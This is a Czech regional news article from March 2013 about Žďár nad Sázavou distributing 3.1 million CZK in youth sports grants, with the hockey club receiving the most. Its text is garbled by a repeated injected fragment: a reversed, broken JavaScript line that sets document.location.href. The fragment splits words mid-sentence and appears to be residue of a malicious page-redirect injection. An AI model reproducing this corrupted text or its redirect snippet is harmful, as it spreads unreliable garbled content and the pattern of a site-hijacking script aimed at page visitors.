Žďár nad Sázavou, zdar nad sazavou, aktuality, hokej, hokejisté, peníze
Rainbow page separator

Nejvíce peněz dostali mladí hokejisté

Úterý, 12. března 2013

hokej-zr-02Žďár nad Sázavou / Celkem 3,1 milionu korun rozdělili žďárští radní z gran[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tového programu na podporu sportu ve městě Sport 2013. Nejvíce peněz obdrží místní klub ledního hokeje, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to 969 tisíc, basketbalový klub (615 tisíc korun) či fotbalový klub Žďas (400 tisíc).

Spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní grant podporuje spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní činnost mládežnických oddílů a spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní akce – na sport bylo vyčleněno 2,9 milionu korun a na akce dvě stě tisíc.

V le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce se o příspěvek na mládežnický sport zajímalo šestnáct subjektů na celkem sedmadvacet projektů, dohromady požadovaly kolem pěti milionů korun.

V některých žádostech však byly nedostatky, což v důsledku mohlo znamenat vyřazení projektu, případně nižší přiznanou finanční podporu města.

„Dohodli jsme se s hodnotitelskou komisí, že pro žadatele uskutečníme seminář, jak správně žádat o grant,“ uvedl žďárský mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosta Ladislav Bárta.